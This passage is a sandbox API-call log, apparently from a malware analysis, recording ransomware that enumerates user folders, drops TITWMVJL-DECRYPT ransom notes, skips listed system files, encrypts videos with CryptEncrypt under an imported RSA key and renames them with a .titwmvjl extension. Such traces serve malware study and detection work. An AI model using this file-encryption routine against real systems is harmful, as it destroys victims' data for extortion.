[0095.128] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.128] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.128] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Templates\\d2ca4a09d2ca4deb61a.lock") returned 56 [0095.128] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Templates\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\templates\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0095.129] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.129] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.129] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Templates\\") returned 32 [0095.129] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Templates\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Templates\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Templates\\*" [0095.129] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Templates\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0095.130] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Templates\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0095.130] CloseHandle (hObject=0x230) returned 1 [0095.130] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0095.130] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0095.130] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0095.130] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\TITWMVJL-DECRYPT.txt" [0095.130] lstrlenW (lpString=".titwmvjl") returned 9 [0095.130] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\TITWMVJL-DECRYPT.txt") returned 42 [0095.130] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.130] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 51 [0095.130] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\TITWMVJL-DECRYPT.txt") returned 42 [0095.130] lstrlenW (lpString=".txt") returned 4 [0095.130] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.131] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0095.131] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0095.131] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.131] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\TITWMVJL-DECRYPT.txt") returned 42 [0095.131] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\TITWMVJL-DECRYPT.txt") returned 42 [0095.131] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0095.131] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0095.131] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0095.131] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0095.131] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0095.131] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0095.131] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0095.131] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0095.131] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.132] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0095.132] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0095.132] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0095.132] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Videos" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos" [0095.132] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\" [0095.132] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0095.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.132] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0095.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.133] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0095.133] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.133] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0095.133] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.133] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0095.133] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.133] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.134] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\\\TITWMVJL-DECRYPT.txt") returned 50 [0095.134] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0095.134] GetLastError () returned 0x50 [0095.134] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.134] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.134] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0x1bf)) [0095.134] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.135] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.135] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.135] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\d2ca4a09d2ca4deb61a.lock") returned 53 [0095.135] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0095.135] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.136] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.136] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\") returned 29 [0095.136] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\*" [0095.136] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x503378 [0095.136] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.136] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.137] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.137] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.137] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.137] lstrcmpW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2=".") returned 1 [0095.137] lstrcmpW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="..") returned 1 [0095.137] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="4_IDTqB ZlS-w7.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\4_IDTqB ZlS-w7.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\4_IDTqB ZlS-w7.mp4" [0095.137] lstrlenW (lpString=".titwmvjl") returned 9 [0095.137] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\4_IDTqB ZlS-w7.mp4") returned 47 [0095.137] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.137] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\4_IDTqB ZlS-w7.mp4.titwmvjl") returned 56 [0095.137] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\4_IDTqB ZlS-w7.mp4") returned 47 [0095.137] lstrlenW (lpString=".mp4") returned 4 [0095.137] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.138] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp4 ") returned 5 [0095.138] lstrcmpiW (lpString1=".mp4", lpString2=".titwmvjl") returned -1 [0095.138] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.138] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\4_IDTqB ZlS-w7.mp4") returned 47 [0095.138] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\4_IDTqB ZlS-w7.mp4") returned 47 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="desktop.ini") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="autorun.inf") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="ntuser.dat") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="iconcache.db") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="bootsect.bak") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="boot.ini") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="ntuser.dat.log") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="thumbs.db") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="KRAB-DECRYPT.html") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="CRAB-DECRYPT.html") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="CRAB-DECRYPT.txt") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="ntldr") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="NTDETECT.COM") returned -1 [0095.138] lstrcmpiW (lpString1="4_IDTqB ZlS-w7.mp4", lpString2="Bootfont.bin") returned -1 [0095.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\4_IDTqB ZlS-w7.mp4") returned 47 [0095.139] lstrlenW (lpString=".mp4") returned 4 [0095.139] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.139] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0095.139] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.139] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.139] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\4_IDTqB ZlS-w7.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\4_idtqb zls-w7.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0095.140] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.140] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0095.141] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.141] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.141] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0095.142] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.142] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.142] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.143] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0095.143] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.143] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.143] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.143] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.143] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0095.144] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.144] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.144] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.144] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0095.144] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.144] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.144] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.145] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.145] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0095.145] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.146] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5032f8) returned 1 [0095.146] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.146] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0095.146] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.146] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0095.146] GetLastError () returned 0x0 [0095.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.147] CryptDestroyKey (hKey=0x5032f8) returned 1 [0095.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.147] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.147] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0095.148] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.148] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503578) returned 1 [0095.148] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.148] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0095.148] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.149] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0095.149] GetLastError () returned 0x0 [0095.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.149] CryptDestroyKey (hKey=0x503578) returned 1 [0095.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.149] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.149] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.150] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.150] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x6c32, lpOverlapped=0x0) returned 1 [0095.175] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff93ce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.175] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6c32, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x6c32, lpOverlapped=0x0) returned 1 [0095.190] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.190] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0095.191] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.195] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.195] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.195] CloseHandle (hObject=0x2ac) returned 1 [0095.196] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\4_IDTqB ZlS-w7.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\4_idtqb zls-w7.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\4_IDTqB ZlS-w7.mp4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\4_idtqb zls-w7.mp4.titwmvjl"), dwFlags=0x1) returned 1 [0095.197] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.197] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.197] lstrcmpW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2=".") returned 1 [0095.197] lstrcmpW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="..") returned 1 [0095.197] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="8h2T0TOTp1FE793l0V5z.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8h2T0TOTp1FE793l0V5z.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8h2T0TOTp1FE793l0V5z.mkv" [0095.197] lstrlenW (lpString=".titwmvjl") returned 9 [0095.197] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8h2T0TOTp1FE793l0V5z.mkv") returned 53 [0095.197] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.197] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8h2T0TOTp1FE793l0V5z.mkv.titwmvjl") returned 62 [0095.197] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8h2T0TOTp1FE793l0V5z.mkv") returned 53 [0095.197] lstrlenW (lpString=".mkv") returned 4 [0095.197] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.197] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mkv ") returned 5 [0095.197] lstrcmpiW (lpString1=".mkv", lpString2=".titwmvjl") returned -1 [0095.197] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.197] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8h2T0TOTp1FE793l0V5z.mkv") returned 53 [0095.198] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8h2T0TOTp1FE793l0V5z.mkv") returned 53 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="desktop.ini") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="autorun.inf") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="ntuser.dat") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="iconcache.db") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="bootsect.bak") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="boot.ini") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="ntuser.dat.log") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="thumbs.db") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="KRAB-DECRYPT.html") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="CRAB-DECRYPT.html") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="CRAB-DECRYPT.txt") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="ntldr") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="NTDETECT.COM") returned -1 [0095.198] lstrcmpiW (lpString1="8h2T0TOTp1FE793l0V5z.mkv", lpString2="Bootfont.bin") returned -1 [0095.198] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8h2T0TOTp1FE793l0V5z.mkv") returned 53 [0095.198] lstrlenW (lpString=".mkv") returned 4 [0095.198] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.198] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mkv ") returned 5 [0095.198] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.198] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.198] CreateFileW 